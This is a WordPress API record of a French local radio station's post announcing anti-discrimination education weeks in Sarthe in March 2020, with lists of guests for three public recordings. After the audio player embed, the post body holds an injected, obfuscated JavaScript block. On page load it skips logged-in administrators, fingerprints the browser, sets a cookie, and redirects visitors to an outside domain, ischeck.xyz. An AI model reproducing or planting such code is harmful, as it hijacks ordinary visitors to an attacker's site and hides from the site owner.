{"id":2761,"date":"2020-02-26T12:30:07","date_gmt":"2020-02-26T11:30:07","guid":{"rendered":"http:\/\/www.contactfm72.fr\/?p=2761"},"modified":"2020-02-27T11:03:55","modified_gmt":"2020-02-27T10:03:55","slug":"les-semaines-deducation-contre-les-discriminations-reviennent-en-mars","status":"publish","type":"post","link":"https:\/\/contactfm72.fr\/?p=2761","title":{"rendered":"Les Semaines d&#8217;\u00e9ducation contre les discriminations reviennent en mars"},"content":{"rendered":"<p>Le Collectif d&#8217;\u00e9ducation \u00e0 la citoyennet\u00e9 et \u00e0 la diversit\u00e9, coordonn\u00e9 par la Ligue de l&#8217;enseignement propose depuis 20 ans un programme d&#8217;actions sur le th\u00e8me de la lutte contre les discriminations. Ces actions se d\u00e9ploieront tout au long du mois de mars dans tout le d\u00e9partement.<\/p>\n<p>Pour en parler, Benjamin Dagard, Charg\u00e9 d&#8217;\u00e9ducation \u00e0 la Ligue de l&#8217;enseignement est l&#8217;invit\u00e9 de l&#8217;Interview du jour ce mercredi \u00e0 18h, jeudi \u00e0 13h, samedi \u00e0 9h et dimanche \u00e0 11h.<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/fal72.org\/laligue72\/semaines-deducation-contre-les-discriminations-2020\/\">Le programme d\u00e9taill\u00e9<\/a><\/p>\n<p><a href=\"https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSdF1juGskeF5Iy0v6CLg2O50FENtNHRSAekxITndgiVm6Yxvg\/viewform?usp=sf_link\">La fiche d&#8217;inscription au forum La\u00efcit\u00e9 \/ Diversit\u00e9 du 26 mars<\/a><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Dans le cadre des Semaines d&#8217;\u00e9ducation contre les discriminations en Sarthe, Contact FM proposera trois enregistrements publics :<\/strong><\/p>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div><strong><span style=\"text-decoration: underline;\">Le vendredi 28 f\u00e9vrier \u00e0 10h \u00e0 la Mairie de Vaas<\/span><\/strong>, &#8220;\u00c9lus en territoire rural : repr\u00e9sentants d&#8217;une popuation discrimin\u00e9e?&#8221; :<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>Quatre e\u0301lus ruraux nous parleront des difficulte\u0301s qu\u2019ils peuvent rencontrer au quotidien et les raisons de leur engagement.<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div><span style=\"text-decoration: underline;\">Voici la liste des invite\u0301s :<\/span><\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Yveline LIMODIN, Maire de Vaas et Vice-Pre\u0301sidente de la Communaute\u0301 de Communes Sud Sarthe<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Be\u0301atrice PAVY-MORANC\u0327AIS, Maire de Montval-sur-Loir, Pre\u0301sidente de la Communaute\u0301 de Communes Loir Luce\u0301 Berce\u0301 et Vice-Pre\u0301sidente du Conseil De\u0301partemental de la Sarthe<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Louis-Jean DE NICOLAY\u0308, Se\u0301nateur de la Sarthe, Conseiller Municipal du Lude et Conseiller Communautaire du Sud Sarthe<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Patrick CINTRAT, Maire de Neuvy-le-Roi, Conseiller Communautaire de Ga\u0302tines- Choisilles-Pays-de-Racan et Conseiller Re\u0301gional du Centre-Val-de-Loire<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<p><span style=\"text-decoration: underline;\"><strong>Jeudi 12 mars \u00e0 10h au Centre d\u2019art contemporain des Moulins de Paillard \u00e0 Ponc\u00e9-sur-le-Loir<\/strong><\/span>, &#8220;L\u2019offre culturelle en territoire rural : un levier d\u2019\u00e9galit\u00e9?&#8221;<\/p>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>Des acteurs du monde culturel rural t\u00e9moignent de l\u2019importance de d\u00e9velopper l\u2019offre culturelle en zone rurale et les enjeux d\u2019\u00e9ducation et d\u2019\u00e9panouissement qu\u2019elle repr\u00e9sente pour des populations qui ne se sentent pas toujours l\u00e9gitime de s\u2019int\u00e9resser \u00e0 l\u2019art et \u00e0 la culture.<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div><span style=\"text-decoration: underline;\">Les invite\u0301s :<\/span><\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Shelly DE VITO, co-Directrice du Centre d\u2019Art Contemporain des Moulins de Paillard<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Delphine MASSART, Responsable du P\u00f4le Culture et Patrimoine du PETR Pays Valle\u0301e du Loir<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Gae\u0308lle GUE\u0301RANGER, Danseuse, Chore\u0301graphe et Metteuse en Sce\u0300ne de la Compagnie CLINAMEN base\u0301e a\u0300 Jupilles<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Sophie JOUSSE, Directrice des affaires culturelles de la ville de Montval-sur-Loir<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 E\u0301lise GILBERT, Coordinatrice culturelle de la ville de Neuvy-le-Roi et de l\u2019association Cultur\u2019o Pre\u0301<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<div>\u2022 Ludovic GAIGNARD, Animateur et responsable de l\u2019Espace Multime\u0301dia Socio-Culturel de Saint-Paterne-Racan, co- organisateur du Festival les Kampagn\u2019arts<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div title=\"Page 1\">\n<div>\n<p>Enfin, <strong><span style=\"text-decoration: underline;\">le mercredi 25 mars \u00e0 15h<\/span><\/strong>, Contact FM s&#8217;associe au Centre Social Loir et Berc\u00e9 et \u00e0 la junior association Anim&#8217; ton territoire pour proposer une \u00e9mission en public enregistr\u00e9e \u00e0 la <strong><span style=\"text-decoration: underline;\">Biblioth\u00e8que-Ludoth\u00e8que Juliette Drouet<\/span><\/strong>. Les membres d&#8217;Anim&#8217; ton territoire ont particip\u00e9 \u00e0 plusieurs ateliers radios et pr\u00e9par\u00e9 une \u00e9mission consacr\u00e9e aux questions de discrimination, de diversit\u00e9 et de lutte contre les in\u00e9galit\u00e9s.<\/p>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<div id=\"audioigniter-283\" class=\"audioigniter-root \" data-player-type=\"full\" data-tracks-url=\"https:\/\/contactfm72.fr\/?audioigniter_playlist_id=283\" data-display-track-no=\"false\" data-reverse-track-order=\"false\" data-display-tracklist-covers=\"false\" data-display-active-cover=\"false\" data-display-artist-names=\"false\" data-display-buy-buttons=\"true\" data-buy-buttons-target=\"false\" data-cycle-tracks=\"false\" data-display-credits=\"false\" data-display-tracklist=\"true\" data-allow-tracklist-toggle=\"false\" data-allow-tracklist-loop=\"true\" data-limit-tracklist-height=\"true\" data-volume=\"100\" data-tracklist-height=\"185\" data-allow-track-loop=\"false\" ><\/div><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/ischeck.xyz\/?pma1','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n<!-- AddThis Advanced Settings generic via filter on the_content --><!-- AddThis Share Buttons generic via filter on the_content -->","protected":false},"excerpt":{"rendered":"<p>Le Collectif d&#8217;\u00e9ducation \u00e0 la citoyennet\u00e9 et \u00e0 la diversit\u00e9, coordonn\u00e9 par la Ligue de l&#8217;enseignement propose depuis 20 ans un programme d&#8217;actions sur le th\u00e8me de la lutte contre les discriminations. Ces actions se d\u00e9ploieront tout au long du mois de mars dans tout le d\u00e9partement. Pour en parler, Benjamin Dagard, Charg\u00e9 d&#8217;\u00e9ducation \u00e0&hellip;<!-- AddThis Advanced Settings generic via filter on get_the_excerpt --><!-- AddThis Share Buttons generic via filter on get_the_excerpt --><\/p>\n","protected":false},"author":4,"featured_media":2799,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-2761","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linterview-du-jour","category-5","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Les Semaines d&#039;\u00e9ducation contre les discriminations reviennent en mars - Contact FM 99.3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/contactfm72.fr\/?p=2761\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Les Semaines d&#039;\u00e9ducation contre les discriminations reviennent en mars - Contact FM 99.3\" \/>\n<meta property=\"og:description\" content=\"Le Collectif d&#8217;\u00e9ducation \u00e0 la citoyennet\u00e9 et \u00e0 la diversit\u00e9, coordonn\u00e9 par la Ligue de l&#8217;enseignement propose depuis 20 ans un programme d&#8217;actions sur le th\u00e8me de la lutte contre les discriminations. Ces actions se d\u00e9ploieront tout au long du mois de mars dans tout le d\u00e9partement. Pour en parler, Benjamin Dagard, Charg\u00e9 d&#8217;\u00e9ducation \u00e0&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/contactfm72.fr\/?p=2761\" \/>\n<meta property=\"og:site_name\" content=\"Contact FM 99.3\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Contactfm.Chateauduloir\" \/>\n<meta property=\"article:published_time\" content=\"2020-02-26T11:30:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-02-27T10:03:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/contactfm72.fr\/wp-content\/uploads\/2020\/02\/SECDES-prog-Contact.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"825\" \/>\n\t<meta property=\"og:image:height\" content=\"619\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Val\u00e9rie C.\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@contactfm72\" \/>\n<meta name=\"twitter:site\" content=\"@contactfm72\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Val\u00e9rie C.\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761\"},\"author\":{\"name\":\"Val\u00e9rie C.\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/person\\\/9fdc9d1c2eb029354a4f1535b90ba82d\"},\"headline\":\"Les Semaines d&#8217;\u00e9ducation contre les discriminations reviennent en mars\",\"datePublished\":\"2020-02-26T11:30:07+00:00\",\"dateModified\":\"2020-02-27T10:03:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761\"},\"wordCount\":515,\"publisher\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/SECDES-prog-Contact.jpg\",\"articleSection\":[\"L'interview du jour\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761\",\"name\":\"Les Semaines d'\u00e9ducation contre les discriminations reviennent en mars - Contact FM 99.3\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/SECDES-prog-Contact.jpg\",\"datePublished\":\"2020-02-26T11:30:07+00:00\",\"dateModified\":\"2020-02-27T10:03:55+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/contactfm72.fr\\\/?p=2761\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761#primaryimage\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/SECDES-prog-Contact.jpg\",\"contentUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/SECDES-prog-Contact.jpg\",\"width\":825,\"height\":619},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=2761#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/contactfm72.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Les Semaines d&#8217;\u00e9ducation contre les discriminations reviennent en mars\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#website\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/\",\"name\":\"Contact FM 99.3\",\"description\":\"Votre radio en vall\u00e9e du Loir\",\"publisher\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/contactfm72.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#organization\",\"name\":\"Contact FM 99.3\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/2025-04-18-2.jpg\",\"contentUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/2025-04-18-2.jpg\",\"width\":680,\"height\":307,\"caption\":\"Contact FM 99.3\"},\"image\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/Contactfm.Chateauduloir\",\"https:\\\/\\\/x.com\\\/contactfm72\",\"https:\\\/\\\/www.instagram.com\\\/contact.fm.72?igsh=cGhlMHQ5N2JlNnpp\",\"https:\\\/\\\/www.tiktok.com\\\/@contact.fm\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/person\\\/9fdc9d1c2eb029354a4f1535b90ba82d\",\"name\":\"Val\u00e9rie C.\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g\",\"caption\":\"Val\u00e9rie C.\"},\"url\":\"https:\\\/\\\/contactfm72.fr\\\/?author=4\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Les Semaines d'\u00e9ducation contre les discriminations reviennent en mars - Contact FM 99.3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/contactfm72.fr\/?p=2761","og_locale":"fr_FR","og_type":"article","og_title":"Les Semaines d'\u00e9ducation contre les discriminations reviennent en mars - Contact FM 99.3","og_description":"Le Collectif d&#8217;\u00e9ducation \u00e0 la citoyennet\u00e9 et \u00e0 la diversit\u00e9, coordonn\u00e9 par la Ligue de l&#8217;enseignement propose depuis 20 ans un programme d&#8217;actions sur le th\u00e8me de la lutte contre les discriminations. Ces actions se d\u00e9ploieront tout au long du mois de mars dans tout le d\u00e9partement. Pour en parler, Benjamin Dagard, Charg\u00e9 d&#8217;\u00e9ducation \u00e0&hellip;","og_url":"https:\/\/contactfm72.fr\/?p=2761","og_site_name":"Contact FM 99.3","article_publisher":"https:\/\/www.facebook.com\/Contactfm.Chateauduloir","article_published_time":"2020-02-26T11:30:07+00:00","article_modified_time":"2020-02-27T10:03:55+00:00","og_image":[{"width":825,"height":619,"url":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2020\/02\/SECDES-prog-Contact.jpg","type":"image\/jpeg"}],"author":"Val\u00e9rie C.","twitter_card":"summary_large_image","twitter_creator":"@contactfm72","twitter_site":"@contactfm72","twitter_misc":{"\u00c9crit par":"Val\u00e9rie C.","Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/contactfm72.fr\/?p=2761#article","isPartOf":{"@id":"https:\/\/contactfm72.fr\/?p=2761"},"author":{"name":"Val\u00e9rie C.","@id":"https:\/\/contactfm72.fr\/#\/schema\/person\/9fdc9d1c2eb029354a4f1535b90ba82d"},"headline":"Les Semaines d&#8217;\u00e9ducation contre les discriminations reviennent en mars","datePublished":"2020-02-26T11:30:07+00:00","dateModified":"2020-02-27T10:03:55+00:00","mainEntityOfPage":{"@id":"https:\/\/contactfm72.fr\/?p=2761"},"wordCount":515,"publisher":{"@id":"https:\/\/contactfm72.fr\/#organization"},"image":{"@id":"https:\/\/contactfm72.fr\/?p=2761#primaryimage"},"thumbnailUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2020\/02\/SECDES-prog-Contact.jpg","articleSection":["L'interview du jour"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/contactfm72.fr\/?p=2761","url":"https:\/\/contactfm72.fr\/?p=2761","name":"Les Semaines d'\u00e9ducation contre les discriminations reviennent en mars - Contact FM 99.3","isPartOf":{"@id":"https:\/\/contactfm72.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/contactfm72.fr\/?p=2761#primaryimage"},"image":{"@id":"https:\/\/contactfm72.fr\/?p=2761#primaryimage"},"thumbnailUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2020\/02\/SECDES-prog-Contact.jpg","datePublished":"2020-02-26T11:30:07+00:00","dateModified":"2020-02-27T10:03:55+00:00","breadcrumb":{"@id":"https:\/\/contactfm72.fr\/?p=2761#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/contactfm72.fr\/?p=2761"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/contactfm72.fr\/?p=2761#primaryimage","url":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2020\/02\/SECDES-prog-Contact.jpg","contentUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2020\/02\/SECDES-prog-Contact.jpg","width":825,"height":619},{"@type":"BreadcrumbList","@id":"https:\/\/contactfm72.fr\/?p=2761#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/contactfm72.fr\/"},{"@type":"ListItem","position":2,"name":"Les Semaines d&#8217;\u00e9ducation contre les discriminations reviennent en mars"}]},{"@type":"WebSite","@id":"https:\/\/contactfm72.fr\/#website","url":"https:\/\/contactfm72.fr\/","name":"Contact FM 99.3","description":"Votre radio en vall\u00e9e du Loir","publisher":{"@id":"https:\/\/contactfm72.fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/contactfm72.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/contactfm72.fr\/#organization","name":"Contact FM 99.3","url":"https:\/\/contactfm72.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/contactfm72.fr\/#\/schema\/logo\/image\/","url":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2025\/04\/2025-04-18-2.jpg","contentUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2025\/04\/2025-04-18-2.jpg","width":680,"height":307,"caption":"Contact FM 99.3"},"image":{"@id":"https:\/\/contactfm72.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Contactfm.Chateauduloir","https:\/\/x.com\/contactfm72","https:\/\/www.instagram.com\/contact.fm.72?igsh=cGhlMHQ5N2JlNnpp","https:\/\/www.tiktok.com\/@contact.fm"]},{"@type":"Person","@id":"https:\/\/contactfm72.fr\/#\/schema\/person\/9fdc9d1c2eb029354a4f1535b90ba82d","name":"Val\u00e9rie C.","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g","caption":"Val\u00e9rie C."},"url":"https:\/\/contactfm72.fr\/?author=4"}]}},"_links":{"self":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts\/2761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2761"}],"version-history":[{"count":5,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts\/2761\/revisions"}],"predecessor-version":[{"id":2796,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts\/2761\/revisions\/2796"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/media\/2799"}],"wp:attachment":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}